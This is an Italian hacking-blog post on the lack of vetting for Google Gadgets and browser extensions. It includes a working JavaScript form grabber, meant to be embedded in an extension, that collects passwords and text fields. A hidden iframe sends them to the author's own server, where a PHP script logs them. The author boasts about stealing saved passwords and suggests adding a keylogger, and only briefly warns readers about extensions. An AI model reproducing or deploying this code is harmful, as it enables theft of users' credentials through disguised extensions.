Google (in)security ? o.O

E’ 10 giorni che ho la febbre non passa più porco cazzo merda aaaaaaaaa poi con sto caldo di merda aaaaaaaa vabbè.

Dicono che alla segnalazione di bug, rispondano così:

Si, è vero, è un bug, ma non sappiamo come patchare.. hai qualche suggerimento?

Però, sinceramente non stanno molto attenti alla sicurezza.

Un paio di anni fa’, evilsocket, ha dimostrato che caricando su igoogle Gadgets fatto ad hoc, è possibile prendere il controllo del browser della vittima.

Evil, faceva solo un alert(document.cookie), ma se avesse inserito script come beef ?o.O

Tutto questo perchè google non effettua un controllo sui Gadgets caricati dagli utenti.

D’altronde non può nemmeno controllare a mano i tantissimi Gadgets che vengono caricati giornalmente.

Questo problema è valido anche per le estensioni di google chrome oppure di firefox, dove è stato trovato un worm.

Guardate ad esempio questo javascript, che potrebbe essere inserito in ogni estensione:

//author:clshack
//Site:www.clshack.com
// where is form ? o.O
var site=window.location;
var F = document.forms;
for(var j=0; j<F.length; ++j)
{
	var f = F[j];
	for (var i=0; i<f.length; ++i)
	{
		if ((f[i].type.toLowerCase() == "password" || f[i].type.toLowerCase() == "text") && f[i].value!="" )
		{
			send("Site:"+site);
			send("Name input:"+f[i].name);
			send("Value:"+f[i].value);
		}
	}
}
/*
function send(data){
	var http = new XMLHttpRequest();
	var url = "http://www.clshack.com";
	http.open("GET", url+"?"+data, true);
	//http.setRequestHeader("Access-Control-Allow-Origin",window.location);
	http.send(null);
}
*/
//iframe invisible :P
function send(data) {
   ifrm = document.createElement("IFRAME");
   ifrm.setAttribute("src", "http://www.clshack.com/PAGE.PHP?log="+data);
   ifrm.style.width = 0+"px";
   ifrm.style.height = 0+"px";
   ifrm.setAttribute("frameborder", "no");
   ifrm.setAttribute("style", "display:none");
   document.body.appendChild(ifrm);

}

Cosa fa ?

Cerca nella pagina se ci sono campi input, guarda se non sono vuoti => PASSWORD SALVATE e se non sono vuoti, me li spedisce sfruttando un iframe e bypassando cosi il controllo, che google mi faceva, ajax, sul “Access-Control-Allow-Origin”.
Pensavo di usare ajax io, facevo prima :P
Invece, mi è toccato usare gli iframe :(

Beh comunque, mi crea un iframe ad una pagina php che mi registra i dati :D

PHP
	//contenuto file txt
	$ora=date("H:i");
	//nome file txt
	$data1=date("d.m.y");
	$fh = fopen("log.log", 'a+');
	fwrite($fh,"n");
	fwrite($fh,"====================n");
	fwrite($fh,"DATI:n");
	$value=$_GET["log"];
	fwrite($fh,$value."n");
	fwrite($fh,"n");
	fwrite($fh, "Data:$ora"." ".$data1 );
	fwrite($fh,"====================n");
	fclose($fh);
PHP

E cosi fotto tutte le password salvate o.O

Poi se uno ci aggiunge un keylogger e così via ? o.O

Attenti alle estensioni che vi installate, nessuna viene controllata manualmente.

Ci tengo poi a sottolineare che il bug, dei Malicious Google Gadgets dimostrato addirittura con un video illustrativo o.O da emanuele gentili il grande**** hacer, beh evilsocket lo aveva già scoperto anni fa.

Chissà se adesso fa un video anche sulle Malicious exstension di chrome e firefox, poi magari passa ai plugin msn plus,amsn e così via o.O panicooooooooooooooooooooooo

Articoli correlati:

1. Guida: GOOGLE HACKING
2. [tutorial]Tool for Information Gathering
3. Windows: Comandi "hacker" !
4. [How-To]XSSer automatic tool for pentesting XSS